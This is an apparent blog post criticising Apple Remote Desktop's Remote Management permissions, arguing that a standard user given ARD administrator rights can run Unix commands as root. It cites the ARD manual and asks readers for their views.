Page 66 of the ARD manual does go into detail about what needs to be turned on to run a Unix command, but why not just have a checkbox: Run Unix Command? Also, Generate reports isn't listed as one of them, but unless it was checked I got this:

Now I'm not saying this is an out-and-out security breach, no, because it requires admin privileges to turn on the service and add the user, but it does show how simply ticking a checkbox as an admin could open your Mac up to Bad Things™ if a standard user on your family computer has a weak password and someone else has ARD in a dark alley… well, you know what I mean. This just doesn't seem right. Standard users should only be able to do standard-user things, even in the magical world of ARD.

See the ARD manual, pages 65-68, for Apple's wording on the Remote Management preference pane permissions. See if it seems clear that standard users given 'administrator' (ARD administrator, in this case) privileges can run as root. Leave a comment and let me know what you think, thanks.